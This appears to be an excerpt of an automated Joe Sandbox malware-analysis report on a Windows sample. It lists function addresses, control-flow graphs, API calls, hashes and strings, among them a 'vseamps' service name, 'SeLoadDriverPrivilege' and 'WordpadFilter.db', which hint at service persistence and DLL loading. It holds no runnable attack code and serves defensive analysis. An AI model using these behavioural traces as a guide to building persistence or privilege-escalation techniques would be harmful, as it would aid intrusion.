                                                                                        Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 272 140007552 271->272 273 140007537-140007554 271->273 272->260 273->264 274->256 275->260
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                        • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                                        • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                        • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                                                                        Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateReadmalloc
                                                                                        • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                                        • API String ID: 3950102678-3381721293
                                                                                        • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                        • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                                        • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                        • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                                                                        Function 00007FFE1A511C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 25 7ffe1a511c00-7ffe1a511c06 26 7ffe1a511c41-7ffe1a511c4b 25->26 27 7ffe1a511c08-7ffe1a511c0b 25->27 28 7ffe1a511d68-7ffe1a511d7d 26->28 29 7ffe1a511c35-7ffe1a511c74 call 7ffe1a512470 27->29 30 7ffe1a511c0d-7ffe1a511c10 27->30 34 7ffe1a511d7f 28->34 35 7ffe1a511d8c-7ffe1a511da6 call 7ffe1a512304 28->35 48 7ffe1a511d42 29->48 49 7ffe1a511c7a-7ffe1a511c8f call 7ffe1a512304 29->49 32 7ffe1a511c12-7ffe1a511c15 30->32 33 7ffe1a511c28 __scrt_dllmain_crt_thread_attach 30->33 39 7ffe1a511c21-7ffe1a511c26 call 7ffe1a5123b4 32->39 40 7ffe1a511c17-7ffe1a511c20 32->40 37 7ffe1a511c2d-7ffe1a511c34 33->37 41 7ffe1a511d81-7ffe1a511d8b 34->41 46 7ffe1a511da8-7ffe1a511dd9 call 7ffe1a51242c call 7ffe1a5122d4 call 7ffe1a5127b4 call 7ffe1a5125d0 call 7ffe1a5125f4 call 7ffe1a51245c 35->46 47 7ffe1a511ddb-7ffe1a511e0c call 7ffe1a512630 35->47 39->37 46->41 57 7ffe1a511e0e-7ffe1a511e14 47->57 58 7ffe1a511e1d-7ffe1a511e23 47->58 52 7ffe1a511d44-7ffe1a511d59 48->52 60 7ffe1a511c95-7ffe1a511ca6 call 7ffe1a512374 49->60 61 7ffe1a511d5a-7ffe1a511d67 call 7ffe1a512630 49->61 57->58 62 7ffe1a511e16-7ffe1a511e18 57->62 63 7ffe1a511e65-7ffe1a511e6d call 7ffe1a511720 58->63 64 7ffe1a511e25-7ffe1a511e2f 58->64 78 7ffe1a511cf7-7ffe1a511d01 call 7ffe1a5125d0 60->78 79 7ffe1a511ca8-7ffe1a511ccc call 7ffe1a512778 call 7ffe1a5122c4 call 7ffe1a5122e8 call 7ffe1a517b10 60->79 61->28 68 7ffe1a511f02-7ffe1a511f0f 62->68 75 7ffe1a511e72-7ffe1a511e7b 63->75 69 7ffe1a511e31-7ffe1a511e34 64->69 70 7ffe1a511e36-7ffe1a511e3c 64->70 76 7ffe1a511e3e-7ffe1a511e44 69->76 70->76 80 7ffe1a511eb3-7ffe1a511eb5 75->80 81 7ffe1a511e7d-7ffe1a511e7f 75->81 84 7ffe1a511ef8-7ffe1a511f00 76->84 85 7ffe1a511e4a-7ffe1a511e5f call 7ffe1a511c00 76->85 78->48 101 7ffe1a511d03-7ffe1a511d0f call 7ffe1a512620 78->101 79->78 127 7ffe1a511cce-7ffe1a511cd5 __scrt_dllmain_after_initialize_c 79->127 91 7ffe1a511eb7-7ffe1a511eba 80->91 92 7ffe1a511ebc-7ffe1a511ed1 call 7ffe1a511c00 80->92 81->80 89 7ffe1a511e81-7ffe1a511ea3 call 7ffe1a511720 call 7ffe1a511d68 81->89 84->68 85->63 85->84 89->80 122 7ffe1a511ea5-7ffe1a511eaa 89->122 91->84 91->92 92->84 111 7ffe1a511ed3-7ffe1a511edd 92->111 112 7ffe1a511d11-7ffe1a511d1b call 7ffe1a512538 101->112 113 7ffe1a511d35-7ffe1a511d40 101->113 117 7ffe1a511edf-7ffe1a511ee2 111->117 118 7ffe1a511ee4-7ffe1a511ef2 111->118 112->113 126 7ffe1a511d1d-7ffe1a511d2b 112->126 113->52 119 7ffe1a511ef4 117->119 118->119 119->84 122->80 126->113 127->78 128 7ffe1a511cd7-7ffe1a511cf4 call 7ffe1a517acc 127->128 128->78
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                        • String ID:
                                                                                        • API String ID: 190073905-0
                                                                                        • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                        • Instruction ID: c21254168a6c38ba4aeb7cc295dc4afa669e855f3f2cc82f7fd314385894a44c
                                                                                        • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                        • Instruction Fuzzy Hash: 83817C61F0CF4385FA54ABA794412B92692BF57FE0F5445FBE90C476B2DE3CE8468600
                                                                                        Function 00007FFE1A511720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                                                        • String ID: WordpadFilter.db
                                                                                        • API String ID: 868324331-3647581008
                                                                                        • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                        • Instruction ID: 262a7618dd604510a41771ef6bd69b5565cfe51350de7ece001007f1a8e80642
                                                                                        • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                        • Instruction Fuzzy Hash: E6317C32B19F41C9E700CBA2D8406BD73A6FB89B98F1445BAEE4D13B54EE38D591C340
                                                                                        Function 00007FFE1A5111B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 196 7ffe1a5111b0-7ffe1a511207 197 7ffe1a511209-7ffe1a511222 call 7ffe1a521490 196->197 198 7ffe1a51124b-7ffe1a51124e 196->198 210 7ffe1a51123e 197->210 211 7ffe1a511224-7ffe1a511227 197->211 199 7ffe1a511254-7ffe1a511280 198->199 200 7ffe1a5114b8-7ffe1a5114bf 198->200 202 7ffe1a511282-7ffe1a51128f 199->202 203 7ffe1a5112f6-7ffe1a511335 call 7ffe1a511b90 call 7ffe1a520a50 199->203 204 7ffe1a5114c3-7ffe1a5114ea call 7ffe1a511b70 200->204 207 7ffe1a5114f1-7ffe1a5114f6 call 7ffe1a511a40 202->207 208 7ffe1a511295-7ffe1a51129c 202->208 231 7ffe1a511340-7ffe1a5113cb 203->231 220 7ffe1a5114f7-7ffe1a5114ff call 7ffe1a511110 207->220 213 7ffe1a51129e-7ffe1a5112a5 208->213 214 7ffe1a5112c7-7ffe1a5112cf call 7ffe1a511b90 208->214 216 7ffe1a511241-7ffe1a511246 210->216 211->216 217 7ffe1a511229-7ffe1a51123c call 7ffe1a521490 211->217 213->220 221 7ffe1a5112ab-7ffe1a5112b3 call 7ffe1a511b90 213->221 233 7ffe1a5112d2-7ffe1a5112f1 call 7ffe1a520e10 214->233 216->198 217->210 217->211 235 7ffe1a5112b9-7ffe1a5112c5 221->235 236 7ffe1a5114eb-7ffe1a5114f0 call 7ffe1a5179cc 221->236 231->231 234 7ffe1a5113d1-7ffe1a5113da 231->234 233->203 238 7ffe1a5113e0-7ffe1a511402 234->238 235->233 236->207 241 7ffe1a511411-7ffe1a51142c 238->241 242 7ffe1a511404-7ffe1a51140e 238->242 241->238 244 7ffe1a51142e-7ffe1a511436 241->244 242->241 245 7ffe1a511498-7ffe1a5114a6 244->245 246 7ffe1a511438-7ffe1a51143b 244->246 247 7ffe1a5114b6 245->247 248 7ffe1a5114a8-7ffe1a5114b5 call 7ffe1a511bcc 245->248 249 7ffe1a511440-7ffe1a511449 246->249 247->204 248->247 251 7ffe1a511455-7ffe1a511465 249->251 252 7ffe1a51144b-7ffe1a511453 249->252 254 7ffe1a511470-7ffe1a511496 251->254 255 7ffe1a511467-7ffe1a51146e 251->255 252->251 254->245 254->249 255->254
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 73155330-0
                                                                                        • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                        • Instruction ID: 20d6554e5a77a0e93d02f1eb56233782f8c58d09a44b0c09e4f8f4e9a80f9ef3
                                                                                        • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                        • Instruction Fuzzy Hash: A3813A22B1DB8245E6118B3698401B9B695FF57FE4F1483BBEE59577A2EF3CE0918300

                                                                                        Non-executed Functions

                                                                                        Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3526400053-0
                                                                                        • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                        • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                                        • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                        • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                                        Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                                        • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                                        • API String ID: 3408796845-4213300970
                                                                                        • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                        • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                                        • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                        • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                                        Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                                        • String ID: ampStopSingletone: logging ended
                                                                                        • API String ID: 2048888615-3533855269
                                                                                        • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                        • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                                        • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                        • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                                        Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                        • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                                        • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                        • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                                        Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastManagerOpen$FileModuleName
                                                                                        • String ID: /remove$/service$vseamps
                                                                                        • API String ID: 67513587-3839141145
                                                                                        • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                        • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                                                        • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                        • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                                                        Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                                        • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                                        • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                                          • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Load$Library
                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                        • API String ID: 3981747205-232180764
                                                                                        • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                        • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                                                        • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                        • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                                                        Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                                        • String ID:
                                                                                        • API String ID: 4284112124-0
                                                                                        • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                        • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                                                        • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                        • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                                                        Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                                        • String ID: vseamps
                                                                                        • API String ID: 3693165506-3944098904
                                                                                        • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                        • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                                                        • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                        • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                                                        Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
